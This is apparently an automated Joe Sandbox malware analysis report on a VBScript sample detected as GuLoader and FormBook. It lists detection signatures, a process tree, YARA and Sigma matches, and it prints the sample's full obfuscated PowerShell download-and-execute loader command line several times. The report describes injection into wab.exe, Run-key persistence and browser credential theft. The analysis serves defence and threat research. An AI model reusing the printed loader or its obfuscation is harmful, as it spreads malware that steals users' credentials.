Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IMG-466573885783553Folketingsmedlemmers.vbs

Overview

General Information

Sample name:IMG-466573885783553Folketingsmedlemmers.vbs
Analysis ID:1450445
MD5:622f2e2a15eda9d46a0d8ad2d9c3438a
SHA1:3c1f879724659f5274a96a9f5dd39c6ced286a4e
SHA256:0566b9624b3a112acec15ffcc968bbe2543a632412ab1cceafa45bf946962038
Tags:HUNvbs
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6372 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-466573885783553Folketingsmedlemmers.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6600 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Clamourers=Beshout ' tran$ LiniGmaskieamphinled meOph lrGlutti ,inicActivaUrinelRis,klyngliy .uto.LerkrDForkaoEme.owUnd.rn Behol Refoo PansaAtrordLge.rFesta,iRachel ColoeAd,rd( eral$,ogerGquadreHypocmTambu,Svovl$ ,symF V,mao Psykd AuspbUddeloDayfll iksedKhiraoSexfir BistgoptraaSlutrnKnoldiSplejsHippoa Venet ManniUafheo UnexnMinoreti sfrNdudgn OpmaeAp.ea)Bea,b ';$Fodboldorganisationerne=$Blafferen[0];Lovbundnes (Beshout 'Konce$EntergBeentlNonsuo FjelbSpuilaMulenlCirro: b gyN.rozaopolarnKotelokn.fic MaricB yaniSwi,ddAdditeAcadenVekset Min a Wi tl.ernelSelvsyMorai1Smrsy7 M ta2S.ill=P vot( OkseT PolyeTyr,fsImpedtCoten-PowerPTr.lda,orblt ,rdihSphac Bhmis$Se.erFSnag,oRettedLagerbUdr.goRef rlFanfadCattioSkomarDivu.g Pai,aHydronDatasi Ov rs,admoaKentatBrudliFjernoCou,tnB,ddeeBakeprKendenIndise St.m)Corne ');while (!$Nonoccidentally172) {Lovbundnes (Beshout ',runs$Skol gMicmal reado S,otbKlokkaReprol Scra:VendevMondnamodtarSto ai iscoaT,nktbThornl daarep intrAlternUnboheSkarns Glu.=Uniqu$UnbeatG adur,ompluSrtrye Jet, ') ;Lovbundnes $Clamourers;Lovbundnes (Beshout 'InfraS.outttRmn naunderr Su,ptImper-J wryS.oneulStrate Abase.npicpSalg, rabl4.pise ');Lovbundnes (Beshout ' Rain$SemisgoutbulInveio,onoubFarinaCo,kelMar o:RigerNDobbeo FortnKoldboJuicecH xesc Cau iWhackd BocaeBehaanFredst,glina Oct.lSlavel P.ogyVaske1Lived7Milie2 Kend=Afpri(Eff,kTBotcheOsmans notitNonno-OverfP Amarad.vintUnconh skov Bid $ faksFTorveoHydradAars bFeltmoFuli.lFantad Pisto,pilirImpi gGen,eaLi.ninSto,ei,ncepsCommea Bj rtCafe i NordoAdmednTilsteHenvirspra,n De.oeBarun)Alter ') ;Lovbundnes (Beshout ' Stea$FirblgGlycelRaadsospindbSyc naUnapol tult:Umy,dsInd,spA logoE.sprrBetlutfersksPlas.f TraniU ilas acitkBld re .omorAce onCounteMindssSkndi=Legif$TudengL nollBr aroWeanebImpowa utorletche:BohunG Squ r recoiRenu.z Icht1 prog8 .hut0Spoof+cereb+Colum% .ril$BarghMAntr.aSku.dsBespesXenylaDitlecufuldrUnf,leUnb.odEpisc.For,rcM,casoagerduSpankn Su.etRigge ') ;$Gem=$Massacred[$sportsfiskernes];}$Sycophant=286850;$Fanhouse=29309;Lovbundnes (Beshout 'Quadr$FlunkgNonv.lDejlio BikobOutseaFolkllDe pa:SkabeBKor,te ScothSwe.eaOctarnPresadLem rlstr,jiFuppenKarstgRanglsTun,sf kop oe.iserPreanmtriun ,abat=upwra CombG.raileneddmtP.yba-Fal.oC A.buosne,nnBrutttDiss eLaparn CorntAkti. Outb $SinceF sonnoServidForstbOpt.goBaandlAn icdMagneoSy.aprNonp.gToposaCiaren Ochei S,nds e,tia Pantt FormiAdmonoAfklan ickseSiamerAnnlin Oliee Koll ');Lovbundnes (Beshout 'Seama$CountgCooeelJagghoS,nerb DiblaSocialTe,mo:ParceEAnvenmCrammbProreoSecresUd aaoGadetmPome Spe i=Acyli Gospe[Il.ndSHaardyButiksTeazltRingteTostimCygn,.AutofCScorpoD span ephav,jforeBedarrUitsptMarti]sp.ne:Rumpi:skndeFD,mner,olypoUdbu,m nkkB .icoaDampbsA,stieMn,mo6istem4br.epS Alrut AfsprUltraiG.dsknUnautgGendr(Reinl$ KamfB Yleteskolah Zamba,ammonAnnlidAttacl TlleiTanksn DonogFe.ins,llenfSta,lo D bbrPh,nom.awky)Vrdis ');Lovbundnes (Beshout 'unspr$Stratg SnarlUenigoAttribPrvetaDiabolIntur:BarocBExtrauFarv,l Trm.dPalaerCounteMidaitMalle Palis= Unco Atro[SkabiS amleyL,ggisTit ltMakuleV nermEskim. co nTVan,ueLungsxBastitUintj.CouteEE,ternUrbancProgro Shedd ,arii MisrnRetoagNemat]Fibro:Cup,u:ColorALu,skSSvbesCT.metIKbestIDorge.L,gerGSkif,eAfba,tBaldaSAtomkt RegirAkkomiEksamnFantagNibbl(Sju,k$Uove,EInspem.levabYulboo CreasBremsoFlammmAspha)Tro b ');Lovbundnes (Beshout 'Broth$Pippeg BesplPioneoUdsteb chooa tagnlStrop:GrangBA.grerLithoeExpatvgispeiHoerecTurk,aObstru AlbudHy roaGui,i2Rhaps=Bredb$BasepBUnderu alalNonend Solir WhizeLevirtPen.a. Forss.dminuU,idebOpkalsFdekltKredsr F,rpirvesknImpr.g,mfor(S,dni$ GendSK.areyYngstc S naoGnubbpreverhInsena CathnraaditInsen,Be,vr$ColosFHe,ira,oknenNst.ihNestloReeleut.anss Fo.eePredi) ongu ');Lovbundnes $Brevicauda2;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3744 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7668 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Clamourers=Beshout ' tran$ LiniGmaskieamphinled meOph lrGlutti ,inicActivaUrinelRis,klyngliy .uto.LerkrDForkaoEme.owUnd.rn Behol Refoo PansaAtrordLge.rFesta,iRachel ColoeAd,rd( eral$,ogerGquadreHypocmTambu,Svovl$ ,symF V,mao Psykd AuspbUddeloDayfll iksedKhiraoSexfir BistgoptraaSlutrnKnoldiSplejsHippoa Venet ManniUafheo UnexnMinoreti sfrNdudgn OpmaeAp.ea)Bea,b ';$Fodboldorganisationerne=$Blafferen[0];Lovbundnes (Beshout 'Konce$EntergBeentlNonsuo FjelbSpuilaMulenlCirro: b gyN.rozaopolarnKotelokn.fic MaricB yaniSwi,ddAdditeAcadenVekset Min a Wi tl.ernelSelvsyMorai1Smrsy7 M ta2S.ill=P vot( OkseT PolyeTyr,fsImpedtCoten-PowerPTr.lda,orblt ,rdihSphac Bhmis$Se.erFSnag,oRettedLagerbUdr.goRef rlFanfadCattioSkomarDivu.g Pai,aHydronDatasi Ov rs,admoaKentatBrudliFjernoCou,tnB,ddeeBakeprKendenIndise St.m)Corne ');while (!$Nonoccidentally172) {Lovbundnes (Beshout ',runs$Skol gMicmal reado S,otbKlokkaReprol Scra:VendevMondnamodtarSto ai iscoaT,nktbThornl daarep intrAlternUnboheSkarns Glu.=Uniqu$UnbeatG adur,ompluSrtrye Jet, ') ;Lovbundnes $Clamourers;Lovbundnes (Beshout 'InfraS.outttRmn naunderr Su,ptImper-J wryS.oneulStrate Abase.npicpSalg, rabl4.pise ');Lovbundnes (Beshout ' Rain$SemisgoutbulInveio,onoubFarinaCo,kelMar o:RigerNDobbeo FortnKoldboJuicecH xesc Cau iWhackd BocaeBehaanFredst,glina Oct.lSlavel P.ogyVaske1Lived7Milie2 Kend=Afpri(Eff,kTBotcheOsmans notitNonno-OverfP Amarad.vintUnconh skov Bid $ faksFTorveoHydradAars bFeltmoFuli.lFantad Pisto,pilirImpi gGen,eaLi.ninSto,ei,ncepsCommea Bj rtCafe i NordoAdmednTilsteHenvirspra,n De.oeBarun)Alter ') ;Lovbundnes (Beshout ' Stea$FirblgGlycelRaadsospindbSyc naUnapol tult:Umy,dsInd,spA logoE.sprrBetlutfersksPlas.f TraniU ilas acitkBld re .omorAce onCounteMindssSkndi=Legif$TudengL nollBr aroWeanebImpowa utorletche:BohunG Squ r recoiRenu.z Icht1 prog8 .hut0Spoof+cereb+Colum% .ril$BarghMAntr.aSku.dsBespesXenylaDitlecufuldrUnf,leUnb.odEpisc.For,rcM,casoagerduSpankn Su.etRigge ') ;$Gem=$Massacred[$sportsfiskernes];}$Sycophant=286850;$Fanhouse=29309;Lovbundnes (Beshout 'Quadr$FlunkgNonv.lDejlio BikobOutseaFolkllDe pa:SkabeBKor,te ScothSwe.eaOctarnPresadLem rlstr,jiFuppenKarstgRanglsTun,sf kop oe.iserPreanmtriun ,abat=upwra CombG.raileneddmtP.yba-Fal.oC A.buosne,nnBrutttDiss eLaparn CorntAkti. Outb $SinceF sonnoServidForstbOpt.goBaandlAn icdMagneoSy.aprNonp.gToposaCiaren Ochei S,nds e,tia Pantt FormiAdmonoAfklan ickseSiamerAnnlin Oliee Koll ');Lovbundnes (Beshout 'Seama$CountgCooeelJagghoS,nerb DiblaSocialTe,mo:ParceEAnvenmCrammbProreoSecresUd aaoGadetmPome Spe i=Acyli Gospe[Il.ndSHaardyButiksTeazltRingteTostimCygn,.AutofCScorpoD span ephav,jforeBedarrUitsptMarti]sp.ne:Rumpi:skndeFD,mner,olypoUdbu,m nkkB .icoaDampbsA,stieMn,mo6istem4br.epS Alrut AfsprUltraiG.dsknUnautgGendr(Reinl$ KamfB Yleteskolah Zamba,ammonAnnlidAttacl TlleiTanksn DonogFe.ins,llenfSta,lo D bbrPh,nom.awky)Vrdis ');Lovbundnes (Beshout 'unspr$Stratg SnarlUenigoAttribPrvetaDiabolIntur:BarocBExtrauFarv,l Trm.dPalaerCounteMidaitMalle Palis= Unco Atro[SkabiS amleyL,ggisTit ltMakuleV nermEskim. co nTVan,ueLungsxBastitUintj.CouteEE,ternUrbancProgro Shedd ,arii MisrnRetoagNemat]Fibro:Cup,u:ColorALu,skSSvbesCT.metIKbestIDorge.L,gerGSkif,eAfba,tBaldaSAtomkt RegirAkkomiEksamnFantagNibbl(Sju,k$Uove,EInspem.levabYulboo CreasBremsoFlammmAspha)Tro b ');Lovbundnes (Beshout 'Broth$Pippeg BesplPioneoUdsteb chooa tagnlStrop:GrangBA.grerLithoeExpatvgispeiHoerecTurk,aObstru AlbudHy roaGui,i2Rhaps=Bredb$BasepBUnderu alalNonend Solir WhizeLevirtPen.a. Forss.dminuU,idebOpkalsFdekltKredsr F,rpirvesknImpr.g,mfor(S,dni$ GendSK.areyYngstc S naoGnubbpreverhInsena CathnraaditInsen,Be,vr$ColosFHe,ira,oknenNst.ihNestloReeleut.anss Fo.eePredi) ongu ');Lovbundnes $Brevicauda2;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7752 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 7984 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7992 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • dczsDTwoOAPdxoSvtjazysDUwNBh.exe (PID: 5372 cmdline: "C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • clip.exe (PID: 2064 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)
              • dczsDTwoOAPdxoSvtjazysDUwNBh.exe (PID: 6256 cmdline: "C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • firefox.exe (PID: 2156 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • wab.exe (PID: 2344 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • rundll32.exe (PID: 1168 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • wab.exe (PID: 1268 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000E.00000002.1660236750.00000000086F0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000016.00000002.2532785700.0000000002750000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000016.00000002.2532785700.0000000002750000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a540:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13adf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000016.00000002.2533029666.0000000002790000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000016.00000002.2533029666.0000000002790000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2a540:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x13adf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        Click to see the 18 entries
        SourceRuleDescriptionAuthorStrings
        amsi64_6600.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          amsi32_7668.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0xe19d:$b2: ::FromBase64String(
          • 0xd250:$s1: -join
          • 0x69fc:$s4: +=
          • 0x6abe:$s4: +=
          • 0xace5:$s4: +=
          • 0xce02:$s4: +=
          • 0xd0ec:$s4: +=
          • 0xd232:$s4: +=
          • 0x17302:$s4: +=
          • 0x17382:$s4: +=
          • 0x17448:$s4: +=
          • 0x174c8:$s4: +=
          • 0x1769e:$s4: +=
          • 0x17722:$s4: +=
          • 0xda34:$e4: Get-WmiObject
          • 0xdc23:$e4: Get-Process
          • 0xdc7b:$e4: Start-Process
          • 0x15e1c:$e4: Get-Process

          System Summary

          barindex
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-466573885783553Folketingsmedlemmers.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-466573885783553Folketingsmedlemmers.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-466573885783553Folketingsmedlemmers.vbs", ProcessId: 6372, ProcessName: wscript.exe
          Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe" , CommandLine: "C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe, NewProcessName: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe, OriginalFileName: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7992, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe" , ProcessId: 5372, ProcessName: dczsDTwoOAPdxoSvtjazysDUwNBh.exe
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\windows mail\wab.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\clip.exe, ProcessId: 2064, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1RTLGNO0FD
          Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-466573885783553Folketingsmedlemmers.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-466573885783553Folketingsmedlemmers.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-466573885783553Folketingsmedlemmers.vbs", ProcessId: 6372, ProcessName: wscript.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 